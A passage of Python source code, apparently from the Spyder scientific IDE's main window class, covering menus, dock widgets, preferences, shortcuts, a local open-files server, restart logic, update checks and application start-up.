toolbars.append(dic[name])
self.visible_toolbars = toolbars
else:
self.get_visible_toolbars()
self._update_show_toolbars_action()
@Slot()
def show_toolbars(self):
"""Show/Hides toolbars."""
value = not self.toolbars_visible
CONF.set('main', 'toolbars_visible', value)
if value:
self.save_visible_toolbars()
else:
self.get_visible_toolbars()
for toolbar in self.visible_toolbars:
toolbar.toggleViewAction().setChecked(value)
toolbar.setVisible(value)
self.toolbars_visible = value
self._update_show_toolbars_action()
# --- Other
def valid_project(self):
"""Handle an invalid active project."""
try:
path = self.projects.get_active_project_path()
except AttributeError:
return
if bool(path):
if not self.projects.is_valid_project(path):
if path:
QMessageBox.critical(
self,
_('Error'),
_("<b>{}</b> is no longer a valid Spyder project! "
"Since it is the current active project, it will "
"be closed automatically.").format(path))
self.projects.close_project()
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu"""
for element in getattr(self, menu + '_menu_actions'):
if element and isinstance(element, QAction):
if element._shown_shortcut is not None:
element.setShortcut(element._shown_shortcut)
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu"""
for element in getattr(self, menu + '_menu_actions'):
if element and isinstance(element, QAction):
if element._shown_shortcut is not None:
element.setShortcut(QKeySequence())
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
widget = QApplication.focusWidget()
from spyder.widgets.shell import ShellBaseWidget
from spyder.widgets.editor import TextEditBaseWidget
from spyder.widgets.ipythonconsole import ControlWidget
# if focused widget isn't valid try the last focused
if not isinstance(widget, (ShellBaseWidget, TextEditBaseWidget,
ControlWidget)):
widget = self.previous_focused_widget
textedit_properties = None
if isinstance(widget, (ShellBaseWidget, TextEditBaseWidget,
ControlWidget)):
console = isinstance(widget, (ShellBaseWidget, ControlWidget))
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
#!!! Below this line, widget is expected to be a QPlainTextEdit instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if not console and not_readonly and not self.editor.is_file_opened():
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled( readwrite_editor \
and widget.document().isUndoAvailable() )
self.redo_action.setEnabled( readwrite_editor \
and widget.document().isRedoAvailable() )
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
if self.menuBar().hasFocus():
return
widget, textedit_properties = self.get_focus_widget_properties()
for action in self.editor.search_menu_actions:
try:
action.setEnabled(self.editor.isAncestorOf(widget))
except RuntimeError:
pass
if textedit_properties is None: # widget is not an editor/console
return
#!!! Below this line, widget is expected to be a QPlainTextEdit instance
_x, _y, readwrite_editor = textedit_properties
# Disable the replace action for read-only files
self.search_menu_actions[3].setEnabled(readwrite_editor)
def create_plugins_menu(self):
order = ['editor', 'console', 'ipython_console', 'variable_explorer',
'help', None, 'explorer', 'outline_explorer',
'project_explorer', 'find_in_files', None, 'historylog',
'profiler', 'breakpoints', 'pylint', None,
'onlinehelp', 'internal_console']
for plugin in self.widgetlist:
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
try:
name = plugin.CONF_SECTION
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
actions = order[:]
for action in order:
if type(action) is str:
actions.remove(action)
self.plugins_menu_actions = actions
add_actions(self.plugins_menu, actions)
def create_toolbars_menu(self):
order = ['file_toolbar', 'run_toolbar', 'debug_toolbar',
'main_toolbar', 'Global working directory', None,
'search_toolbar', 'edit_toolbar', 'source_toolbar']
for toolbar in self.toolbarslist:
action = toolbar.toggleViewAction()
name = toolbar.objectName()
try:
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
add_actions(self.toolbars_menu, order)
def createPopupMenu(self):
menu = QMenu('', self)
actions = self.help_menu_actions[:3] + \
[None, self.help_menu_actions[-1]]
add_actions(menu, actions)
return menu
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
self.debug_print(message)
self.splash.show()
self.splash.showMessage(message, Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute, QColor(Qt.white))
QApplication.processEvents()
def remove_tmpdir(self):
"""Remove Spyder temporary directory"""
if CONF.get('main', 'single_instance') and not self.new_instance:
shutil.rmtree(programs.TEMPDIR, ignore_errors=True)
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in self.widgetlist:
if plugin.isAncestorOf(self.last_focused_widget):
plugin.visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
prefix = 'window' + '/'
self.save_current_window_settings(prefix)
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
for plugin in self.thirdparty_plugins:
if not plugin.closing_plugin(cancelable):
return False
for widget in self.widgetlist:
if not widget.closing_plugin(cancelable):
return False
self.dialog_manager.close_all()
if self.toolbars_visible:
self.save_visible_toolbars()
self.already_closed = True
return True
def add_dockwidget(self, child):
"""Add QDockWidget and toggleViewAction"""
dockwidget, location = child.create_dockwidget()
if CONF.get('main', 'vertical_dockwidget_titlebars'):
dockwidget.setFeatures(dockwidget.features()|
QDockWidget.DockWidgetVerticalTitleBar)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(child)
@Slot()
def close_current_dockwidget(self):
widget = QApplication.focusWidget()
for plugin in self.widgetlist:
if plugin.isAncestorOf(widget):
plugin.dockwidget.hide()
break
def toggle_lock_dockwidgets(self, value):
"""Lock/Unlock dockwidgets"""
self.dockwidgets_locked = value
self.apply_panes_settings()
CONF.set('main', 'panes_locked', value)
def __update_maximize_action(self):
if self.state_before_maximizing is None:
text = _("Maximize current pane")
tip = _("Maximize current pane")
icon = ima.icon('maximize')
else:
text = _("Restore current pane")
tip = _("Restore pane to its original size")
icon = ima.icon('unmaximize')
self.maximize_action.setText(text)
self.maximize_action.setIcon(icon)
self.maximize_action.setToolTip(tip)
@Slot()
@Slot(bool)
def maximize_dockwidget(self, restore=False):
"""Shortcut: Ctrl+Alt+Shift+M
First call: maximize current dockwidget
Second call (or restore=True): restore original window layout"""
if self.state_before_maximizing is None:
if restore:
return
# Select plugin to maximize
self.state_before_maximizing = self.saveState()
focus_widget = QApplication.focusWidget()
for plugin in self.widgetlist:
plugin.dockwidget.hide()
if plugin.isAncestorOf(focus_widget):
self.last_plugin = plugin
# Only plugins that have a dockwidget are part of widgetlist,
# so last_plugin can be None after the above "for" cycle.
# For example, this happens if, after Spyder has started, focus
# is set to the Working directory toolbar (which doesn't have
# a dockwidget) and then you press the Maximize button
if self.last_plugin is None:
# Using the Editor as default plugin to maximize
self.last_plugin = self.editor
# Maximize last_plugin
self.last_plugin.dockwidget.toggleViewAction().setDisabled(True)
self.setCentralWidget(self.last_plugin)
self.last_plugin.ismaximized = True
# Workaround to solve an issue with editor's outline explorer:
# (otherwise the whole plugin is hidden and so is the outline explorer
# and the latter won't be refreshed if not visible)
self.last_plugin.show()
self.last_plugin.visibility_changed(True)
if self.last_plugin is self.editor:
# Automatically show the outline if the editor was maximized:
self.addDockWidget(Qt.RightDockWidgetArea,
self.outlineexplorer.dockwidget)
self.outlineexplorer.dockwidget.show()
else:
# Restore original layout (before maximizing current dockwidget)
self.last_plugin.dockwidget.setWidget(self.last_plugin)
self.last_plugin.dockwidget.toggleViewAction().setEnabled(True)
self.setCentralWidget(None)
self.last_plugin.ismaximized = False
self.restoreState(self.state_before_maximizing)
self.state_before_maximizing = None
self.last_plugin.get_focus_widget().setFocus()
self.__update_maximize_action()
def __update_fullscreen_action(self):
if self.isFullScreen():
icon = ima.icon('window_nofullscreen')
else:
icon = ima.icon('window_fullscreen')
if is_text_string(icon):
icon = get_icon(icon)
self.fullscreen_action.setIcon(icon)
@Slot()
def toggle_fullscreen(self):
if self.isFullScreen():
self.fullscreen_flag = False
self.showNormal()
if self.maximized_flag:
self.showMaximized()
else:
self.maximized_flag = self.isMaximized()
self.fullscreen_flag = True
self.showFullScreen()
self.__update_fullscreen_action()
def add_to_toolbar(self, toolbar, widget):
"""Add widget actions to toolbar"""
actions = widget.toolbar_actions
if actions is not None:
add_actions(toolbar, actions)
@Slot()
def about(self):
"""About Spyder"""
versions = get_versions()
# Show Mercurial revision for development version
revlink = ''
if versions['revision']:
rev = versions['revision']
revlink = " (<a href='https://github.com/spyder-ide/spyder/"\
"commit/%s'>Commit: %s</a>)" % (rev, rev)
QMessageBox.about(self,
_("About %s") % "Spyder",
"""<b>Spyder %s</b> %s
<br>The Scientific PYthon Development EnviRonment
<br>Copyright © The Spyder Project Contributors
<br>Licensed under the terms of the MIT License
<p>Created by Pierre Raybaut.
<br>Developed and maintained by the
<a href="%s/blob/master/AUTHORS">Spyder Project Contributors</a>.
<br>Many thanks to all the Spyder beta testers and regular users.
<p>For help with Spyder errors and crashes, please read our
<a href="%s">Troubleshooting page</a>, and for bug reports and
feature requests, visit our <a href="%s">Github website</a>.
For project discussion, see our <a href="%s">Google Group</a>.
<p>This project is part of a larger effort to promote and
facilitate the use of Python for scientific and engineering
software development. The popular Python distributions
<a href="http://continuum.io/downloads">Anaconda</a>,
<a href="https://winpython.github.io/">WinPython</a> and
<a href="http://python-xy.github.io/">Python(x,y)</a>
also contribute to this plan.
<p>Python %s %dbits, Qt %s, %s %s on %s
<p><small>Most of the icons for the Spyder 2 theme come from the Crystal
Project (© 2006-2007 Everaldo Coelho). Other icons for that
theme come from <a href="http://p.yusukekamiyamane.com/"> Yusuke
Kamiyamane</a> (all rights reserved) and from
<a href="http://www.oxygen-icons.org/">
The Oxygen icon theme</a></small>.
"""
% (versions['spyder'], revlink, __project_url__, __trouble_url__,
__project_url__, __forum_url__, versions['python'],
versions['bitness'], versions['qt'], versions['qt_api'],
versions['qt_api_ver'], versions['system']))
@Slot()
def show_dependencies(self):
"""Show Spyder's Dependencies dialog box"""
from spyder.widgets.dependencies import DependenciesDialog
dlg = DependenciesDialog(None)
dlg.set_data(dependencies.DEPENDENCIES)
dlg.exec_()
def render_issue(self, description='', traceback=''):
"""Render issue before sending it to Github"""
# Get component versions
versions = get_versions()
# Get git revision for development version
revision = ''
if versions['revision']:
revision = versions['revision']
# Make a description header in case no description is supplied
if not description:
description = "### What steps reproduce the problem?"
# Make error section from traceback and add appropriate reminder header
if traceback:
error_section = ("### Traceback\n"
"```python-traceback\n"
"{}\n"
"```".format(traceback))
else:
error_section = ''
issue_template = """\
## Description
{description}
{error_section}
## Versions
* Spyder version: {spyder_version} {commit}
* Python version: {python_version}
* Qt version: {qt_version}
* {qt_api_name} version: {qt_api_version}
* Operating System: {os_name} {os_version}
### Dependencies
```
{dependencies}
```
""".format(description=description,
error_section=error_section,
spyder_version=versions['spyder'],
commit=revision,
python_version=versions['python'],
qt_version=versions['qt'],
qt_api_name=versions['qt_api'],
qt_api_version=versions['qt_api_ver'],
os_name=versions['system'],
os_version=versions['release'],
dependencies=dependencies.status())
return issue_template
@Slot()
def report_issue(self, body=None, title=None, open_webpage=False):
"""Report a Spyder issue to github, generating body text if needed."""
if body is None:
from spyder.widgets.reporterror import SpyderErrorDialog
report_dlg = SpyderErrorDialog(self, is_report=True)
report_dlg.show()
else:
if open_webpage:
if PY3:
from urllib.parse import quote
else:
from urllib import quote # analysis:ignore
from qtpy.QtCore import QUrlQuery
url = QUrl(__project_url__ + '/issues/new')
query = QUrlQuery()
query.addQueryItem("body", quote(body))
if title:
query.addQueryItem("title", quote(title))
url.setQuery(query)
QDesktopServices.openUrl(url)
@Slot()
def trouble_guide(self):
"""Open Spyder troubleshooting guide in a web browser."""
url = QUrl(__trouble_url__)
QDesktopServices.openUrl(url)
@Slot()
def google_group(self):
"""Open Spyder Google Group in a web browser."""
url = QUrl(__forum_url__)
QDesktopServices.openUrl(url)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.widgets.editor import TextEditBaseWidget
# If focused widget isn't valid try the last focused
if not isinstance(widget, TextEditBaseWidget):
widget = self.previous_focused_widget
if isinstance(widget, TextEditBaseWidget):
getattr(widget, callback)()
def redirect_internalshell_stdio(self, state):
if state:
self.console.shell.interpreter.redirect_stds()
else:
self.console.shell.interpreter.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def execute_in_external_console(self, lines, focus_to_editor):
"""
Execute lines in IPython console and eventually set focus
to the Editor.
"""
console = self.ipyconsole
console.visibility_changed(True)
console.raise_()
console.execute_code(lines)
if focus_to_editor:
self.editor.visibility_changed(True)
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
programs.start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
fname = encoding.to_unicode_from_fs(fname)
if osp.isfile(fname):
self.open_file(fname, external=True)
elif osp.isfile(osp.join(CWD, fname)):
self.open_file(osp.join(CWD, fname), external=True)
# ---- PYTHONPATH management, etc.
def get_spyder_pythonpath(self):
"""Return Spyder PYTHONPATH"""
active_path = [p for p in self.path if p not in self.not_active_path]
return active_path + self.project_path
def add_path_to_sys_path(self):
"""Add Spyder path to sys.path"""
for path in reversed(self.get_spyder_pythonpath()):
sys.path.insert(1, path)
def remove_path_from_sys_path(self):
"""Remove Spyder path from sys.path"""
for path in self.path + self.project_path:
while path in sys.path:
sys.path.remove(path)
@Slot()
def path_manager_callback(self):
"""Spyder path manager"""
from spyder.widgets.pathmanager import PathManager
self.remove_path_from_sys_path()
project_path = self.projects.get_pythonpath()
dialog = PathManager(self, self.path, project_path,
self.not_active_path, sync=True)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.exec_()
self.add_path_to_sys_path()
try:
encoding.writelines(self.path, self.SPYDER_PATH) # Saving path
encoding.writelines(self.not_active_path,
self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError:
pass
self.sig_pythonpath_changed.emit()
def pythonpath_changed(self):
"""Projects PYTHONPATH contribution has changed"""
self.remove_path_from_sys_path()
self.project_path = self.projects.get_pythonpath()
self.add_path_to_sys_path()
self.sig_pythonpath_changed.emit()
@Slot()
def win_env(self):
"""Show Windows current user environment variables"""
self.dialog_manager.show(WinUserEnvDialog(self))
#---- Preferences
def apply_settings(self):
"""Apply settings changed in 'Preferences' dialog box"""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes Issue 2036
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
else:
style_name = CONF.get('main', 'windows_style',
self.default_style)
style = QStyleFactory.create(style_name)
if style is not None:
style.setProperty('name', style_name)
qapp.setStyle(style)
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
if CONF.get('main', 'animated_docks'):
default = default|QMainWindow.AnimatedDocks
self.setDockOptions(default)
self.apply_panes_settings()
self.apply_statusbar_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings"""
# Update toggle action on menu
for child in self.widgetlist:
features = child.FEATURES
if CONF.get('main', 'vertical_dockwidget_titlebars'):
features = features | QDockWidget.DockWidgetVerticalTitleBar
if not self.dockwidgets_locked:
features = features | QDockWidget.DockWidgetMovable
child.dockwidget.setFeatures(features)
child.update_margins()
def apply_statusbar_settings(self):
"""Update status bar widgets settings"""
show_status_bar = CONF.get('main', 'show_status_bar')
self.statusBar().setVisible(show_status_bar)
if show_status_bar:
for widget, name in ((self.mem_status, 'memory_usage'),
(self.cpu_status, 'cpu_usage')):
if widget is not None:
widget.setVisible(CONF.get('main', '%s/enable' % name))
widget.set_interval(CONF.get('main', '%s/timeout' % name))
else:
return
@Slot()
def edit_preferences(self):
"""Edit Spyder preferences"""
from spyder.plugins.configdialog import ConfigDialog
dlg = ConfigDialog(self)
dlg.size_change.connect(self.set_prefs_size)
if self.prefs_dialog_size is not None:
dlg.resize(self.prefs_dialog_size)
for PrefPageClass in self.general_prefs:
widget = PrefPageClass(dlg, main=self)
widget.initialize()
dlg.add_page(widget)
for plugin in [self.workingdirectory, self.editor,
self.projects, self.ipyconsole,
self.historylog, self.help, self.variableexplorer,
self.onlinehelp, self.explorer, self.findinfiles
]+self.thirdparty_plugins:
if plugin is not None:
try:
widget = plugin.create_configwidget(dlg)
if widget is not None:
dlg.add_page(widget)
except Exception:
traceback.print_exc(file=sys.stderr)
if self.prefs_index is not None:
dlg.set_current_index(self.prefs_index)
dlg.show()
dlg.check_all_settings()
dlg.pages_widget.currentChanged.connect(self.__preference_page_changed)
dlg.exec_()
def __preference_page_changed(self, index):
"""Preference page index has changed"""
self.prefs_index = index
def set_prefs_size(self, size):
"""Save preferences dialog size"""
self.prefs_dialog_size = size
#---- Shortcuts
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_sc_to_tip=False):
"""
Register QAction or QShortcut to Spyder main application,
with shortcut (context, name, default)
"""
self.shortcut_data.append( (qaction_or_qshortcut, context,
name, add_sc_to_tip) )
def apply_shortcuts(self):
"""Apply shortcuts settings to all widgets/plugins"""
toberemoved = []
for index, (qobject, context, name,
add_sc_to_tip) in enumerate(self.shortcut_data):
keyseq = QKeySequence( get_shortcut(context, name) )
try:
if isinstance(qobject, QAction):
if sys.platform == 'darwin' and \
qobject._shown_shortcut == 'missing':
qobject._shown_shortcut = keyseq
else:
qobject.setShortcut(keyseq)
if add_sc_to_tip:
add_shortcut_to_tooltip(qobject, context, name)
elif isinstance(qobject, QShortcut):
qobject.setKey(keyseq)
except RuntimeError:
# Object has been deleted
toberemoved.append(index)
for index in sorted(toberemoved, reverse=True):
self.shortcut_data.pop(index)
@Slot()
def show_shortcuts_dialog(self):
from spyder.widgets.shortcutssummary import ShortcutsSummaryDialog
dlg = ShortcutsSummaryDialog(None)
dlg.exec_()
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while 1: # 1 is faster than True
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See Issue 1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""
Quit and Restart Spyder application.
If reset True it allows to reset spyder on restart.
"""
# Get start path to use in restart script
spyder_start_directory = get_module_path('spyder')
restart_script = osp.join(spyder_start_directory, 'app', 'restart.py')
# Get any initial argument passed when spyder was started
# Note: Variables defined in bootstrap.py and spyder/app/start.py
env = os.environ.copy()
bootstrap_args = env.pop('SPYDER_BOOTSTRAP_ARGS', None)
spyder_args = env.pop('SPYDER_ARGS')
# Get current process and python running spyder
pid = os.getpid()
python = sys.executable
# Check if started with bootstrap.py
if bootstrap_args is not None:
spyder_args = bootstrap_args
is_bootstrap = True
else:
is_bootstrap = False
# Pass variables as environment variables (str) to restarter subprocess
env['SPYDER_ARGS'] = spyder_args
env['SPYDER_PID'] = str(pid)
env['SPYDER_IS_BOOTSTRAP'] = str(is_bootstrap)
env['SPYDER_RESET'] = str(reset)
if DEV:
if os.name == 'nt':
env['PYTHONPATH'] = ';'.join(sys.path)
else:
env['PYTHONPATH'] = ':'.join(sys.path)
# Build the command and popen arguments depending on the OS
if os.name == 'nt':
# Hide flashing command prompt
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
shell = False
else:
startupinfo = None
shell = True
command = '"{0}" "{1}"'
command = command.format(python, restart_script)
try:
if self.closing(True):
subprocess.Popen(command, shell=shell, env=env,
startupinfo=startupinfo)
self.console.quit()
except Exception as error:
# If there is an error with subprocess, Spyder should not quit and
# the error can be inspected in the internal console
print(error) # spyder: test-skip
print(command) # spyder: test-skip
# ---- Interactive Tours
def show_tour(self, index):
""" """
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Global File Switcher
def open_fileswitcher(self, symbol=False):
"""Open file list management dialog box."""
if self.fileswitcher is not None and \
self.fileswitcher.is_visible:
self.fileswitcher.hide()
self.fileswitcher.is_visible = False
return
if symbol:
self.fileswitcher.plugin = self.editor
self.fileswitcher.set_search_text('@')
else:
self.fileswitcher.set_search_text('')
self.fileswitcher.show()
self.fileswitcher.is_visible = True
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_fileswitcher(symbol=True)
def add_to_fileswitcher(self, plugin, tabs, data, icon):
"""Add a plugin to the File Switcher."""
if self.fileswitcher is None:
self.fileswitcher = FileSwitcher(self, plugin, tabs, data, icon)
else:
self.fileswitcher.add_plugin(plugin, tabs, data, icon)
self.fileswitcher.sig_goto_file.connect(
plugin.get_current_tab_manager().set_stack_index)
# ---- Check for Spyder Updates
def _check_updates_ready(self):
"""Called by WorkerUpdates when ready"""
from spyder.widgets.helperwidgets import MessageCheckBox
# feedback` = False is used on startup, so only positive feedback is
# given. `feedback` = True is used when after startup (when using the
# menu action, and gives feeback if updates are, or are not found.
feedback = self.give_updates_feedback
# Get results from worker
update_available = self.worker_updates.update_available
latest_release = self.worker_updates.latest_release
error_msg = self.worker_updates.error
url_r = __project_url__ + '/releases'
url_i = 'https://docs.spyder-ide.org/installation.html'
# Define the custom QMessageBox
box = MessageCheckBox(icon=QMessageBox.Information,
parent=self)
box.setWindowTitle(_("Spyder updates"))
box.set_checkbox_text(_("Check for updates on startup"))
box.setStandardButtons(QMessageBox.Ok)
box.setDefaultButton(QMessageBox.Ok)
# Adjust the checkbox depending on the stored configuration
section, option = 'main', 'check_updates_on_startup'
check_updates = CONF.get(section, option)
box.set_checked(check_updates)
if error_msg is not None:
msg = error_msg
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
else:
if update_available:
anaconda_msg = ''
if 'Anaconda' in sys.version or 'conda-forge' in sys.version:
anaconda_msg = _("<hr><b>IMPORTANT NOTE:</b> It seems "
"that you are using Spyder with "
"<b>Anaconda/Miniconda</b>. Please "
"<b>don't</b> use <code>pip</code> to "
"update it as that will probably break "
"your installation.<br><br>"
"Instead, please wait until new conda "
"packages are available and use "
"<code>conda</code> to perform the "
"update.<hr>")
msg = _("<b>Spyder %s is available!</b> <br><br>Please use "
"your package manager to update Spyder or go to our "
"<a href=\"%s\">Releases</a> page to download this "
"new version. <br><br>If you are not sure how to "
"proceed to update Spyder please refer to our "
" <a href=\"%s\">Installation</a> instructions."
"") % (latest_release, url_r, url_i)
msg += '<br>' + anaconda_msg
box.setText(msg)
box.set_check_visible(True)
box.exec_()
check_updates = box.is_checked()
elif feedback:
msg = _("Spyder is up to date.")
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
# Update checkbox based on user interaction
CONF.set(section, option, check_updates)
# Enable check_updates_action after the thread has finished
self.check_updates_action.setDisabled(False)
# Provide feeback when clicking menu if check on startup is on
self.give_updates_feedback = True
@Slot()
def check_updates(self, startup=False):
"""
Check for spyder updates on github releases using a QThread.
"""
from spyder.workers.updates import WorkerUpdates
# Disable check_updates_action while the thread is working
self.check_updates_action.setDisabled(True)
if self.thread_updates is not None:
self.thread_updates.terminate()
self.thread_updates = QThread(self)
self.worker_updates = WorkerUpdates(self, startup=startup)
self.worker_updates.sig_ready.connect(self._check_updates_ready)
self.worker_updates.sig_ready.connect(self.thread_updates.quit)
self.worker_updates.moveToThread(self.thread_updates)
self.thread_updates.started.connect(self.worker_updates.start)
self.thread_updates.start()
#==============================================================================
# Utilities to create the 'main' function
#==============================================================================
def initialize():
"""Initialize Qt, patching sys.exit and eventually setting up ETS"""
# This doesn't create our QApplication, just holds a reference to
# MAIN_APP, created above to show our splash screen as early as
# possible
app = qapplication()
# --- Set application icon
app.setWindowIcon(APP_ICON)
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
def fake_sys_exit(arg=[]):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
if PYQT5:
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
# Selecting Qt4 backend for Enthought Tool Suite (if installed)
try:
from enthought.etsconfig.api import ETSConfig
ETSConfig.toolkit = 'qt4'
except ImportError:
pass
return app
class Spy(object):
"""
Inspect Spyder internals
Attributes:
app Reference to main QApplication object
window Reference to spyder.MainWindow widget
"""
def __init__(self, app, window):
self.app = app
self.window = window
def __dir__(self):
return list(self.__dict__.keys()) +\
[x for x in dir(self.__class__) if x[0] != '_']
def versions(self):
return get_versions()
def run_spyder(app, options, args):
"""
Create and show Spyder's main window
Start QApplication event loop
"""
#TODO: insert here
# Main window
main = MainWindow(options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.shell.exit_interpreter()
except BaseException:
pass
raise
main.show()
main.post_visible_setup()
if main.console:
main.console.shell.interpreter.namespace['spy'] = \
Spy(app=app, window=main)
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if running_in_mac_app():
app.sig_open_external_file.connect(main.open_external_file)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not running_under_pytest():
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main():
"""Main function"""
if running_under_pytest():
try:
from unittest.mock import Mock
except ImportError:
from mock import Mock # Python 2
options = Mock()
options.working_directory = None
options.profile = False
options.multithreaded = False
options.new_instance = False
options.open_project = None
options.window_title = None
app = initialize()
window = run_spyder(app, options, None)
return window
# **** Collect command line options ****
# Note regarding Options:
# It's important to collect options before monkey patching sys.exit,
# otherwise, argparse won't be able to exit if --help option is passed
options, args = get_options()
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
